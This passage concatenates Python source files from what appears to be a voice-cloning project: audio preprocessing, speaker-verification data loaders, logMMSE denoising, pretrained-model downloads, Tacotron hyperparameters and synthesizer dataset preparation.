increase_only=True) if webrtcvad and trim_silence: wav = trim_long_silences(wav) return wav def wav_to_mel_spectrogram(wav): """ Derives a mel spectrogram ready to be used by the encoder from a preprocessed audio waveform. Note: this not a log-mel spectrogram. """ frames = librosa.feature.melspectrogram( wav, sampling_rate, n_fft=int(sampling_rate * mel_window_length / 1000), hop_length=int(sampling_rate * mel_window_step / 1000), n_mels=mel_n_channels ) return frames.astype(np.float32).T def trim_long_silences(wav): """ Ensures that segments without voice in the waveform remain no longer than a threshold determined by the VAD parameters in params.py. :param wav: the raw waveform as a numpy array of floats :return: the same waveform with silences trimmed away (length <= original wav length) """ # Compute the voice detection window size samples_per_window = (vad_window_length * sampling_rate) // 1000 # Trim the end of the audio to have a multiple of the window size wav = wav[:len(wav) - (len(wav) % samples_per_window)] # Convert the float waveform to 16-bit mono PCM pcm_wave = struct.pack("%dh" % len(wav), *(np.round(wav * int16_max)).astype(np.int16)) # Perform voice activation detection voice_flags = [] vad = webrtcvad.Vad(mode=3) for window_start in range(0, len(wav), samples_per_window): window_end = window_start + samples_per_window voice_flags.append(vad.is_speech(pcm_wave[window_start * 2:window_end * 2], sample_rate=sampling_rate)) voice_flags = np.array(voice_flags) # Smooth the voice detection with a moving average def moving_average(array, width): array_padded = np.concatenate((np.zeros((width - 1) // 2), array, np.zeros(width // 2))) ret = np.cumsum(array_padded, dtype=float) ret[width:] = ret[width:] - ret[:-width] return ret[width - 1:] / width audio_mask = moving_average(voice_flags, vad_moving_average_width) audio_mask = np.round(audio_mask).astype(np.bool) # Dilate the voiced regions audio_mask = binary_dilation(audio_mask, np.ones(vad_max_silence_length + 1)) audio_mask = np.repeat(audio_mask, samples_per_window) return wav[audio_mask == True] def normalize_volume(wav, target_dBFS, increase_only=False, decrease_only=False): if increase_only and decrease_only: raise ValueError("Both increase only and decrease only are set") dBFS_change = target_dBFS - 10 * np.log10(np.mean(wav ** 2)) if (dBFS_change < 0 and increase_only) or (dBFS_change > 0 and decrease_only): return wav return wav * (10 ** (dBFS_change / 20)) File: encoder/data_objects/speaker_verification_dataset.py from encoder.data_objects.random_cycler import RandomCycler from encoder.data_objects.speaker_batch import SpeakerBatch from encoder.data_objects.speaker import Speaker from encoder.params_data import partials_n_frames from torch.utils.data import Dataset, DataLoader from pathlib import Path # TODO: improve with a pool of speakers for data efficiency class SpeakerVerificationDataset(Dataset): def __init__(self, datasets_root: Path): self.root = datasets_root speaker_dirs = [f for f in self.root.glob("*") if f.is_dir()] if len(speaker_dirs) == 0: raise Exception("No speakers found. Make sure you are pointing to the directory " "containing all preprocessed speaker directories.") self.speakers = [Speaker(speaker_dir) for speaker_dir in speaker_dirs] self.speaker_cycler = RandomCycler(self.speakers) def __len__(self): return int(1e10) def __getitem__(self, index): return next(self.speaker_cycler) def get_logs(self): log_string = "" for log_fpath in self.root.glob("*.txt"): with log_fpath.open("r") as log_file: log_string += "".join(log_file.readlines()) return log_string class SpeakerVerificationDataLoader(DataLoader): def __init__(self, dataset, speakers_per_batch, utterances_per_speaker, sampler=None, batch_sampler=None, num_workers=0, pin_memory=False, timeout=0, worker_init_fn=None): self.utterances_per_speaker = utterances_per_speaker super().__init__( dataset=dataset, batch_size=speakers_per_batch, shuffle=False, sampler=sampler, batch_sampler=batch_sampler, num_workers=num_workers, collate_fn=self.collate, pin_memory=pin_memory, drop_last=False, timeout=timeout, worker_init_fn=worker_init_fn ) def collate(self, speakers): return SpeakerBatch(speakers, self.utterances_per_speaker, partials_n_frames) File: encoder/data_objects/speaker_batch.py import numpy as np from typing import List from encoder.data_objects.speaker import Speaker class SpeakerBatch: def __init__(self, speakers: List[Speaker], utterances_per_speaker: int, n_frames: int): self.speakers = speakers self.partials = {s: s.random_partial(utterances_per_speaker, n_frames) for s in speakers} # Array of shape (n_speakers * n_utterances, n_frames, mel_n), e.g. for 3 speakers with # 4 utterances each of 160 frames of 40 mel coefficients: (12, 160, 40) self.data = np.array([frames for s in speakers for _, frames, _ in self.partials[s]]) File: encoder/data_objects/utterance.py import numpy as np class Utterance: def __init__(self, frames_fpath, wave_fpath): self.frames_fpath = frames_fpath self.wave_fpath = wave_fpath def get_frames(self): return np.load(self.frames_fpath) def random_partial(self, n_frames): """ Crops the frames into a partial utterance of n_frames :param n_frames: The number of frames of the partial utterance :return: the partial utterance frames and a tuple indicating the start and end of the partial utterance in the complete utterance. """ frames = self.get_frames() if frames.shape[0] == n_frames: start = 0 else: start = np.random.randint(0, frames.shape[0] - n_frames) end = start + n_frames return frames[start:end], (start, end) File: encoder/data_objects/__init__.py from encoder.data_objects.speaker_verification_dataset import SpeakerVerificationDataset from encoder.data_objects.speaker_verification_dataset import SpeakerVerificationDataLoader File: encoder/data_objects/random_cycler.py import random class RandomCycler: """ Creates an internal copy of a sequence and allows access to its items in a constrained random order. For a source sequence of n items and one or several consecutive queries of a total of m items, the following guarantees hold (one implies the other): - Each item will be returned between m // n and ((m - 1) // n) + 1 times. - Between two appearances of the same item, there may be at most 2 * (n - 1) other items. """ def __init__(self, source): if len(source) == 0: raise Exception("Can't create RandomCycler from an empty collection") self.all_items = list(source) self.next_items = [] def sample(self, count: int): shuffle = lambda l: random.sample(l, len(l)) out = [] while count > 0: if count >= len(self.all_items): out.extend(shuffle(list(self.all_items))) count -= len(self.all_items) continue n = min(count, len(self.next_items)) out.extend(self.next_items[:n]) count -= n self.next_items = self.next_items[n:] if len(self.next_items) == 0: self.next_items = shuffle(list(self.all_items)) return out def __next__(self): return self.sample(1)[0] File: encoder/data_objects/speaker.py from encoder.data_objects.random_cycler import RandomCycler from encoder.data_objects.utterance import Utterance from pathlib import Path # Contains the set of utterances of a single speaker class Speaker: def __init__(self, root: Path): self.root = root self.name = root.name self.utterances = None self.utterance_cycler = None def _load_utterances(self): with self.root.joinpath("_sources.txt").open("r") as sources_file: sources = [l.split(",") for l in sources_file] sources = {frames_fname: wave_fpath for frames_fname, wave_fpath in sources} self.utterances = [Utterance(self.root.joinpath(f), w) for f, w in sources.items()] self.utterance_cycler = RandomCycler(self.utterances) def random_partial(self, count, n_frames): """ Samples a batch of <count> unique partial utterances from the disk in a way that all utterances come up at least once every two cycles and in a random order every time. :param count: The number of partial utterances to sample from the set of utterances from that speaker. Utterances are guaranteed not to be repeated if <count> is not larger than the number of utterances available. :param n_frames: The number of frames in the partial utterance. :return: A list of tuples (utterance, frames, range) where utterance is an Utterance, frames are the frames of the partial utterances and range is the range of the partial utterance with regard to the complete utterance. """ if self.utterances is None: self._load_utterances() utterances = self.utterance_cycler.sample(count) a = [(u,) + u.random_partial(n_frames) for u in utterances] return a File: utils/logmmse.py # The MIT License (MIT) # # Copyright (c) 2015 braindead # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. # # # This code was extracted from the logmmse package (https://pypi.org/project/logmmse/) and I # simply modified the interface to meet my needs. import numpy as np import math from scipy.special import expn from collections import namedtuple NoiseProfile = namedtuple("NoiseProfile", "sampling_rate window_size len1 len2 win n_fft noise_mu2") def profile_noise(noise, sampling_rate, window_size=0): """ Creates a profile of the noise in a given waveform. :param noise: a waveform containing noise ONLY, as a numpy array of floats or ints. :param sampling_rate: the sampling rate of the audio :param window_size: the size of the window the logmmse algorithm operates on. A default value will be picked if left as 0. :return: a NoiseProfile object """ noise, dtype = to_float(noise) noise += np.finfo(np.float64).eps if window_size == 0: window_size = int(math.floor(0.02 * sampling_rate)) if window_size % 2 == 1: window_size = window_size + 1 perc = 50 len1 = int(math.floor(window_size * perc / 100)) len2 = int(window_size - len1) win = np.hanning(window_size) win = win * len2 / np.sum(win) n_fft = 2 * window_size noise_mean = np.zeros(n_fft) n_frames = len(noise) // window_size for j in range(0, window_size * n_frames, window_size): noise_mean += np.absolute(np.fft.fft(win * noise[j:j + window_size], n_fft, axis=0)) noise_mu2 = (noise_mean / n_frames) ** 2 return NoiseProfile(sampling_rate, window_size, len1, len2, win, n_fft, noise_mu2) def denoise(wav, noise_profile: NoiseProfile, eta=0.15): """ Cleans the noise from a speech waveform given a noise profile. The waveform must have the same sampling rate as the one used to create the noise profile. :param wav: a speech waveform as a numpy array of floats or ints. :param noise_profile: a NoiseProfile object that was created from a similar (or a segment of the same) waveform. :param eta: voice threshold for noise update. While the voice activation detection value is below this threshold, the noise profile will be continuously updated throughout the audio. Set to 0 to disable updating the noise profile. :return: the clean wav as a numpy array of floats or ints of the same length. """ wav, dtype = to_float(wav) wav += np.finfo(np.float64).eps p = noise_profile nframes = int(math.floor(len(wav) / p.len2) - math.floor(p.window_size / p.len2)) x_final = np.zeros(nframes * p.len2) aa = 0.98 mu = 0.98 ksi_min = 10 ** (-25 / 10) x_old = np.zeros(p.len1) xk_prev = np.zeros(p.len1) noise_mu2 = p.noise_mu2 for k in range(0, nframes * p.len2, p.len2): insign = p.win * wav[k:k + p.window_size] spec = np.fft.fft(insign, p.n_fft, axis=0) sig = np.absolute(spec) sig2 = sig ** 2 gammak = np.minimum(sig2 / noise_mu2, 40) if xk_prev.all() == 0: ksi = aa + (1 - aa) * np.maximum(gammak - 1, 0) else: ksi = aa * xk_prev / noise_mu2 + (1 - aa) * np.maximum(gammak - 1, 0) ksi = np.maximum(ksi_min, ksi) log_sigma_k = gammak * ksi/(1 + ksi) - np.log(1 + ksi) vad_decision = np.sum(log_sigma_k) / p.window_size if vad_decision < eta: noise_mu2 = mu * noise_mu2 + (1 - mu) * sig2 a = ksi / (1 + ksi) vk = a * gammak ei_vk = 0.5 * expn(1, np.maximum(vk, 1e-8)) hw = a * np.exp(ei_vk) sig = sig * hw xk_prev = sig ** 2 xi_w = np.fft.ifft(hw * spec, p.n_fft, axis=0) xi_w = np.real(xi_w) x_final[k:k + p.len2] = x_old + xi_w[0:p.len1] x_old = xi_w[p.len1:p.window_size] output = from_float(x_final, dtype) output = np.pad(output, (0, len(wav) - len(output)), mode="constant") return output ## Alternative VAD algorithm to webrctvad. It has the advantage of not requiring to install that ## darn package and it also works for any sampling rate. Maybe I'll eventually use it instead of ## webrctvad # def vad(wav, sampling_rate, eta=0.15, window_size=0): # """ # TODO: fix doc # Creates a profile of the noise in a given waveform. # # :param wav: a waveform containing noise ONLY, as a numpy array of floats or ints. # :param sampling_rate: the sampling rate of the audio # :param window_size: the size of the window the logmmse algorithm operates on. A default value # will be picked if left as 0. # :param eta: voice threshold for noise update. While the voice activation detection value is # below this threshold, the noise profile will be continuously updated throughout the audio. # Set to 0 to disable updating the noise profile. # """ # wav, dtype = to_float(wav) # wav += np.finfo(np.float64).eps # # if window_size == 0: # window_size = int(math.floor(0.02 * sampling_rate)) # # if window_size % 2 == 1: # window_size = window_size + 1 # # perc = 50 # len1 = int(math.floor(window_size * perc / 100)) # len2 = int(window_size - len1) # # win = np.hanning(window_size) # win = win * len2 / np.sum(win) # n_fft = 2 * window_size # # wav_mean = np.zeros(n_fft) # n_frames = len(wav) // window_size # for j in range(0, window_size * n_frames, window_size): # wav_mean += np.absolute(np.fft.fft(win * wav[j:j + window_size], n_fft, axis=0)) # noise_mu2 = (wav_mean / n_frames) ** 2 # # wav, dtype = to_float(wav) # wav += np.finfo(np.float64).eps # # nframes = int(math.floor(len(wav) / len2) - math.floor(window_size / len2)) # vad = np.zeros(nframes * len2, dtype=np.bool) # # aa = 0.98 # mu = 0.98 # ksi_min = 10 ** (-25 / 10) # # xk_prev = np.zeros(len1) # noise_mu2 = noise_mu2 # for k in range(0, nframes * len2, len2): # insign = win * wav[k:k + window_size] # # spec = np.fft.fft(insign, n_fft, axis=0) # sig = np.absolute(spec) # sig2 = sig ** 2 # # gammak = np.minimum(sig2 / noise_mu2, 40) # # if xk_prev.all() == 0: # ksi = aa + (1 - aa) * np.maximum(gammak - 1, 0) # else: # ksi = aa * xk_prev / noise_mu2 + (1 - aa) * np.maximum(gammak - 1, 0) # ksi = np.maximum(ksi_min, ksi) # # log_sigma_k = gammak * ksi / (1 + ksi) - np.log(1 + ksi) # vad_decision = np.sum(log_sigma_k) / window_size # if vad_decision < eta: # noise_mu2 = mu * noise_mu2 + (1 - mu) * sig2 # print(vad_decision) # # a = ksi / (1 + ksi) # vk = a * gammak # ei_vk = 0.5 * expn(1, np.maximum(vk, 1e-8)) # hw = a * np.exp(ei_vk) # sig = sig * hw # xk_prev = sig ** 2 # # vad[k:k + len2] = vad_decision >= eta # # vad = np.pad(vad, (0, len(wav) - len(vad)), mode="constant") # return vad def to_float(_input): if _input.dtype == np.float64: return _input, _input.dtype elif _input.dtype == np.float32: return _input.astype(np.float64), _input.dtype elif _input.dtype == np.uint8: return (_input - 128) / 128., _input.dtype elif _input.dtype == np.int16: return _input / 32768., _input.dtype elif _input.dtype == np.int32: return _input / 2147483648., _input.dtype raise ValueError('Unsupported wave file format') def from_float(_input, dtype): if dtype == np.float64: return _input, np.float64 elif dtype == np.float32: return _input.astype(np.float32) elif dtype == np.uint8: return ((_input * 128) + 128).astype(np.uint8) elif dtype == np.int16: return (_input * 32768).astype(np.int16) elif dtype == np.int32: print(_input) return (_input * 2147483648).astype(np.int32) raise ValueError('Unsupported wave file format') File: utils/__init__.py File: utils/default_models.py import urllib.request from pathlib import Path from threading import Thread from urllib.error import HTTPError from tqdm import tqdm default_models = { "encoder": ("https://drive.google.com/uc?export=download&id=1q8mEGwCkFy23KZsinbuvdKAQLqNKbYf1", 17090379), "synthesizer": ("https://drive.google.com/u/0/uc?id=1EqFMIbvxffxtjiVrtykroF6_mUh-5Z3s&export=download&confirm=t", 370554559), "vocoder": ("https://drive.google.com/uc?export=download&id=1cf2NO6FtI0jDuy8AV3Xgn6leO6dHjIgu", 53845290), } class DownloadProgressBar(tqdm): def update_to(self, b=1, bsize=1, tsize=None): if tsize is not None: self.total = tsize self.update(b * bsize - self.n) def download(url: str, target: Path, bar_pos=0): # Ensure the directory exists target.parent.mkdir(exist_ok=True, parents=True) desc = f"Downloading {target.name}" with DownloadProgressBar(unit="B", unit_scale=True, miniters=1, desc=desc, position=bar_pos, leave=False) as t: try: urllib.request.urlretrieve(url, filename=target, reporthook=t.update_to) except HTTPError: return def ensure_default_models(models_dir: Path): # Define download tasks jobs = [] for model_name, (url, size) in default_models.items(): target_path = models_dir / "default" / f"{model_name}.pt" if target_path.exists(): if target_path.stat().st_size != size: print(f"File {target_path} is not of expected size, redownloading...") else: continue thread = Thread(target=download, args=(url, target_path, len(jobs))) thread.start() jobs.append((thread, target_path, size)) # Run and join threads for thread, target_path, size in jobs: thread.join() assert target_path.exists() and target_path.stat().st_size == size, \ f"Download for {target_path.name} failed. You may download models manually instead.\n" \ f"https://drive.google.com/drive/folders/1fU6umc5uQAVR2udZdHX-lDgXYzTyqG_j" File: utils/profiler.py from time import perf_counter as timer from collections import OrderedDict import numpy as np class Profiler: def __init__(self, summarize_every=5, disabled=False): self.last_tick = timer() self.logs = OrderedDict() self.summarize_every = summarize_every self.disabled = disabled def tick(self, name): if self.disabled: return # Log the time needed to execute that function if not name in self.logs: self.logs[name] = [] if len(self.logs[name]) >= self.summarize_every: self.summarize() self.purge_logs() self.logs[name].append(timer() - self.last_tick) self.reset_timer() def purge_logs(self): for name in self.logs: self.logs[name].clear() def reset_timer(self): self.last_tick = timer() def summarize(self): n = max(map(len, self.logs.values())) assert n == self.summarize_every print("\nAverage execution time over %d steps:" % n) name_msgs = ["%s (%d/%d):" % (name, len(deltas), n) for name, deltas in self.logs.items()] pad = max(map(len, name_msgs)) for name_msg, deltas in zip(name_msgs, self.logs.values()): print(" %s mean: %4.0fms std: %4.0fms" % (name_msg.ljust(pad), np.mean(deltas) * 1000, np.std(deltas) * 1000)) print("", flush=True) File: utils/argutils.py from pathlib import Path import numpy as np import argparse _type_priorities = [ # In decreasing order Path, str, int, float, bool, ] def _priority(o): p = next((i for i, t in enumerate(_type_priorities) if type(o) is t), None) if p is not None: return p p = next((i for i, t in enumerate(_type_priorities) if isinstance(o, t)), None) if p is not None: return p return len(_type_priorities) def print_args(args: argparse.Namespace, parser=None): args = vars(args) if parser is None: priorities = list(map(_priority, args.values())) else: all_params = [a.dest for g in parser._action_groups for a in g._group_actions ] priority = lambda p: all_params.index(p) if p in all_params else len(all_params) priorities = list(map(priority, args.keys())) pad = max(map(len, args.keys())) + 3 indices = np.lexsort((list(args.keys()), priorities)) items = list(args.items()) print("Arguments:") for i in indices: param, value = items[i] print(" {0}:{1}{2}".format(param, ' ' * (pad - len(param)), value)) print("") File: synthesizer/hparams.py import ast import pprint class HParams(object): def __init__(self, **kwargs): self.__dict__.update(kwargs) def __setitem__(self, key, value): setattr(self, key, value) def __getitem__(self, key): return getattr(self, key) def __repr__(self): return pprint.pformat(self.__dict__) def parse(self, string): # Overrides hparams from a comma-separated string of name=value pairs if len(string) > 0: overrides = [s.split("=") for s in string.split(",")] keys, values = zip(*overrides) keys = list(map(str.strip, keys)) values = list(map(str.strip, values)) for k in keys: self.__dict__[k] = ast.literal_eval(values[keys.index(k)]) return self hparams = HParams( ### Signal Processing (used in both synthesizer and vocoder) sample_rate = 16000, n_fft = 800, num_mels = 80, hop_size = 200, # Tacotron uses 12.5 ms frame shift (set to sample_rate * 0.0125) win_size = 800, # Tacotron uses 50 ms frame length (set to sample_rate * 0.050) fmin = 55, min_level_db = -100, ref_level_db = 20, max_abs_value = 4., # Gradient explodes if too big, premature convergence if too small. preemphasis = 0.97, # Filter coefficient to use if preemphasize is True preemphasize = True, ### Tacotron Text-to-Speech (TTS) tts_embed_dims = 512, # Embedding dimension for the graphemes/phoneme inputs tts_encoder_dims = 256, tts_decoder_dims = 128, tts_postnet_dims = 512, tts_encoder_K = 5, tts_lstm_dims = 1024, tts_postnet_K = 5, tts_num_highways = 4, tts_dropout = 0.5, tts_cleaner_names = ["english_cleaners"], tts_stop_threshold = -3.4, # Value below which audio generation ends. # For example, for a range of [-4, 4], this # will terminate the sequence at the first # frame that has all values < -3.4 ### Tacotron Training tts_schedule = [(2, 1e-3, 20_000, 12), # Progressive training schedule (2, 5e-4, 40_000, 12), # (r, lr, step, batch_size) (2, 2e-4, 80_000, 12), # (2, 1e-4, 160_000, 12), # r = reduction factor (# of mel frames (2, 3e-5, 320_000, 12), # synthesized for each decoder iteration) (2, 1e-5, 640_000, 12)], # lr = learning rate tts_clip_grad_norm = 1.0, # clips the gradient norm to prevent explosion - set to None if not needed tts_eval_interval = 500, # Number of steps between model evaluation (sample generation) # Set to -1 to generate after completing epoch, or 0 to disable tts_eval_num_samples = 1, # Makes this number of samples ### Data Preprocessing max_mel_frames = 900, rescale = True, rescaling_max = 0.9, synthesis_batch_size = 16, # For vocoder preprocessing and inference. ### Mel Visualization and Griffin-Lim signal_normalization = True, power = 1.5, griffin_lim_iters = 60, ### Audio processing options fmax = 7600, # Should not exceed (sample_rate // 2) allow_clipping_in_normalization = True, # Used when signal_normalization = True clip_mels_length = True, # If true, discards samples exceeding max_mel_frames use_lws = False, # "Fast spectrogram phase recovery using local weighted sums" symmetric_mels = True, # Sets mel range to [-max_abs_value, max_abs_value] if True, # and [0, max_abs_value] if False trim_silence = True, # Use with sample_rate of 16000 for best results ### SV2TTS speaker_embedding_size = 256, # Dimension for the speaker embedding silence_min_duration_split = 0.4, # Duration in seconds of a silence for an utterance to be split utterance_min_duration = 1.6, # Duration in seconds below which utterances are discarded ) def hparams_debug_string(): return str(hparams) File: synthesizer/preprocess.py from multiprocessing.pool import Pool from synthesizer import audio from functools import partial from itertools import chain from encoder import inference as encoder from pathlib import Path from utils import logmmse from tqdm import tqdm import numpy as np import librosa def preprocess_dataset(datasets_root: Path, out_dir: Path, n_processes: int, skip_existing: bool, hparams, no_alignments: bool, datasets_name: str, subfolders: str): # Gather the input directories dataset_root = datasets_root.joinpath(datasets_name) input_dirs = [dataset_root.joinpath(subfolder.strip()) for subfolder in subfolders.split(",")] print("\n ".join(map(str, ["Using data from:"] + input_dirs))) assert all(input_dir.exists() for input_dir in input_dirs) # Create the output directories for each output file type out_dir.joinpath("mels").mkdir(exist_ok=True) out_dir.joinpath("audio").mkdir(exist_ok=True) # Create a metadata file metadata_fpath = out_dir.joinpath("train.txt") metadata_file = metadata_fpath.open("a" if skip_existing else "w", encoding="utf-8") # Preprocess the dataset speaker_dirs = list(chain.from_iterable(input_dir.glob("*") for input_dir in input_dirs)) func = partial(preprocess_speaker, out_dir=out_dir, skip_existing=skip_existing, hparams=hparams, no_alignments=no_alignments) job = Pool(n_processes).imap(func, speaker_dirs) for speaker_metadata in tqdm(job, datasets_name, len(speaker_dirs), unit="speakers"): for metadatum in speaker_metadata: metadata_file.write("|".join(str(x) for x in metadatum) + "\n") metadata_file.close() # Verify the contents of the metadata file with metadata_fpath.open("r", encoding="utf-8") as metadata_file: metadata = [line.split("|") for line in metadata_file] mel_frames = sum([int(m[4]) for m in metadata]) timesteps = sum([int(m[3]) for m in metadata]) sample_rate = hparams.sample_rate hours = (timesteps / sample_rate) / 3600 print("The dataset consists of %d utterances, %d mel frames, %d audio timesteps (%.2f hours)." % (len(metadata), mel_frames, timesteps, hours)) print("Max input length (text chars): %d" % max(len(m[5]) for m in metadata)) print("Max mel frames length: %d" % max(int(m[4]) for m in metadata)) print("Max audio timesteps length: %d" % max(int(m[3]) for m in metadata)) def preprocess_speaker(speaker_dir, out_dir: Path, skip_existing: bool, hparams, no_alignments: bool): metadata = [] for book_dir in speaker_dir.glob("*"): if no_alignments: # Gather the utterance audios and texts # LibriTTS uses .wav but we will include extensions for compatibility with other datasets extensions = ["*.wav", "*.flac", "*.mp3"] for extension in extensions: wav_fpaths = book_dir.glob(extension) for wav_fpath in wav_fpaths: # Load the audio waveform wav, _ = librosa.load(str(wav_fpath), hparams.sample_rate) if hparams.rescale: wav = wav / np.abs(wav).max() * hparams.rescaling_max # Get the corresponding text # Check for .txt (for compatibility with other datasets) text_fpath = wav_fpath.with_suffix(".txt") if not text_fpath.exists(): # Check for .normalized.txt (LibriTTS) text_fpath = wav_fpath.with_suffix(".normalized.txt") assert text_fpath.exists() with text_fpath.open("r") as text_file: text = "".join([line for line in text_file]) text = text.replace("\"", "") text = text.strip() # Process the utterance metadata.append(process_utterance(wav, text, out_dir, str(wav_fpath.with_suffix("").name), skip_existing, hparams)) else: # Process alignment file (LibriSpeech support) # Gather the utterance audios and texts try: alignments_fpath = next(book_dir.glob("*.alignment.txt")) with alignments_fpath.open("r") as alignments_file: alignments = [line.rstrip().split(" ") for line in alignments_file] except StopIteration: # A few alignment files will be missing continue # Iterate over each entry in the alignments file for wav_fname, words, end_times in alignments: wav_fpath = book_dir.joinpath(wav_fname + ".flac") assert wav_fpath.exists() words = words.replace("\"", "").split(",") end_times = list(map(float, end_times.replace("\"", "").split(","))) # Process each sub-utterance wavs, texts = split_on_silences(wav_fpath, words, end_times, hparams) for i, (wav, text) in enumerate(zip(wavs, texts)): sub_basename = "%s_%02d" % (wav_fname, i) metadata.append(process_utterance(wav, text, out_dir, sub_basename, skip_existing, hparams)) return [m for m in metadata if m is not None] def split_on_silences(wav_fpath, words, end_times, hparams): # Load the audio waveform wav, _ = librosa.load(str(wav_fpath), hparams.sample_rate) if hparams.rescale: wav = wav / np.abs(wav).max() * hparams.rescaling_max words = np.array(words) start_times = np.array([0.0] + end_times[:-1]) end_times = np.array(end_times) assert len(words) == len(end_times) == len(start_times) assert words[0] == "" and words[-1] == "" # Find pauses that are too long mask = (words == "") & (end_times - start_times >= hparams.silence_min_duration_split) mask[0] = mask[-1] = True breaks = np.where(mask)[0] # Profile the noise from the silences and perform noise reduction on the waveform silence_times = [[start_times[i], end_times[i]] for i in breaks] silence_times = (np.array(silence_times) * hparams.sample_rate).astype(np.int) noisy_wav = np.concatenate([wav[stime[0]:stime[1]] for stime in silence_times]) if len(noisy_wav) > hparams.sample_rate * 0.02: profile = logmmse.profile_noise(noisy_wav, hparams.sample_rate) wav = logmmse.denoise(wav, profile, eta=0) # Re-attach segments that are too short segments = list(zip(breaks[:-1], breaks[1:])) segment_durations = [start_times[end] - end_times[start] for start, end in segments] i = 0 while i < len(segments) and len(segments) > 1: if segment_durations[i] < hparams.utterance_min_duration: # See if the segment can be re-attached with the right or the left segment left_duration = float("inf") if i == 0 else segment_durations[i - 1] right_duration = float("inf") if i == len(segments) - 1 else segment_durations[i + 1] joined_duration = segment_durations[i] + min(left_duration, right_duration) # Do not re-attach if it causes the joined utterance to be too long if joined_duration > hparams.hop_size * hparams.max_mel_frames / hparams.sample_rate: i += 1 continue # Re-attach the segment with the neighbour of shortest duration j = i - 1 if left_duration <= right_duration else i segments[j] = (segments[j][0], segments[j + 1][1]) segment_durations[j] = joined_duration del segments[j + 1], segment_durations[j + 1] else: i += 1 # Split the utterance segment_times = [[end_times[start], start_times[end]] for start, end in segments] segment_times = (np.array(segment_times) * hparams.sample_rate).astype(np.int) wavs = [wav[segment_time[0]:segment_time[1]] for segment_time in segment_times] texts = [" ".join(words[start + 1:end]).replace(" ", " ") for start, end in segments] # # DEBUG: play the audio segments (run with -n=1) # import sounddevice as sd # if len(wavs) > 1: # print("This sentence was split in %d segments:" % len(wavs)) # else: # print("There are no silences long enough for this sentence to be split:") # for wav, text in zip(wavs, texts): # # Pad the waveform with 1 second of silence because sounddevice tends to cut them early # # when playing them. You shouldn't need to do that in your parsers. # wav = np.concatenate((wav, [0] * 16000)) # print("\t%s" % text) # sd.play(wav, 16000, blocking=True) # print("") return wavs, texts def process_utterance(wav: np.ndarray, text: str, out_dir: Path, basename: str, skip_existing: bool, hparams): ## FOR REFERENCE: # For you not to lose your head if you ever wish to change things here or implement your own # synthesizer. # - Both the audios and the mel spectrograms are saved as numpy arrays # - There is no processing done to the audios that will be saved to disk beyond volume # normalization (in split_on_silences) # - However, pre-emphasis is applied to the audios before computing the mel spectrogram. This # is why we re-apply it on the audio on the side of the vocoder. # - Librosa pads the waveform before computing the mel spectrogram. Here, the waveform is saved # without extra padding. This means that you won't have an exact relation between the length # of the wav and of the mel spectrogram. See the vocoder data loader. # Skip existing utterances if needed mel_fpath = out_dir.joinpath("mels", "mel-%s.npy" % basename) wav_fpath = out_dir.joinpath("audio", "audio-%s.npy" % basename) if skip_existing and mel_fpath.exists() and wav_fpath.exists(): return None # Trim silence if hparams.trim_silence: wav = encoder.preprocess_wav(wav, normalize=False, trim_silence=True) # Skip utterances that are too short if len(wav) < hparams.utterance_min_duration * hparams.sample_rate: return None # Compute the mel spectrogram mel_spectrogram = audio.melspectrogram(wav, hparams).astype(np.float32) mel_frames = mel_spectrogram.shape[1] # Skip utterances that are too long if mel_frames > hparams.max_mel_frames and hparams.clip_mels_length: return None # Write the spectrogram, embed and audio to disk np.save(mel_fpath, mel_spectrogram.T, allow_pickle=False) np.save(wav_fpath, wav, allow_pickle=False) # Return a tuple describing this training example return wav_fpath.name, mel_fpath.name, "embed-%s.npy" % basename, len(wav), mel_frames, text def embed_utterance(fpaths, encoder_model_fpath): if not encoder.is_loaded(): encoder.load_model(encoder_model_fpath) # Compute the speaker embedding of the utterance wav_fpath, embed_fpath = fpaths wav = np.load(wav_fpath) wav = encoder.preprocess_wav(wav) embed = encoder.embed_utterance(wav) np.save(embed_fpath, embed, allow_pickle=False) def create_embeddings(synthesizer_root: Path, encoder_model_fpath: Path, n_processes: int): wav_dir = synthesizer_root.joinpath("audio") metadata_fpath = synthesizer_root.joinpath("train.txt") assert wav_dir.exists() and metadata_fpath.exists() embed_dir = synthesizer_root.joinpath("embeds") embed_dir.mkdir(exist_ok=True) # Gather the input wave filepath and the target output embed filepath with metadata_fpath.open("r") as metadata_file: metadata = [line.split("|") for line in metadata_file] fpaths = [(wav_dir.joinpath(m[0]), embed_dir.joinpath(m[2])) for m in metadata] # TODO: improve on the multiprocessing, it's terrible. Disk I/O is the bottleneck here. # Embed the utterances in separate threads func = partial(embed_utterance, encoder_model_fpath=encoder_model_fpath) job = Pool(n_processes).imap(func, fpaths) list(tqdm(job, "Embedding", len(fpaths), unit="utterances")) File: synthesizer/synthesizer_dataset.py import torch from torch.utils.data import Dataset import numpy as np from pathlib import Path from synthesizer.utils.text import text_to_sequence class SynthesizerDataset(Dataset): def __init__(self, metadata_fpath: Path, mel_dir: Path, embed_dir: Path, hparams): print("Using inputs from:\n\t%s\n\t%s\n\t%s" % (metadata_fpath, mel_dir, embed_dir)) with metadata_fpath.open("r") as metadata_file: metadata = [line.split("|") for line in metadata_file] mel_fnames = [x[1] for x in metadata if int(x[4])] mel_fpaths = [mel_dir.joinpath(fname) for fname in mel_fnames] embed_fnames = [x[2] for x in metadata if int(x[4])] embed_fpaths = [embed_dir.joinpath(fname) for fname in embed_fnames] self.samples_fpaths = list(zip(mel_fpaths, embed_fpaths)) self.samples_texts = [x[5].strip() for x in metadata if int(x[4])] self.metadata = metadata self.hparams = hparams print("Found %d samples" % len(self.samples_fpaths)) def __getitem__(self, index): # Sometimes index may be a list of 2 (not sure why this happens) # If that is the case, return a single item corresponding to first element in index if index is list: index 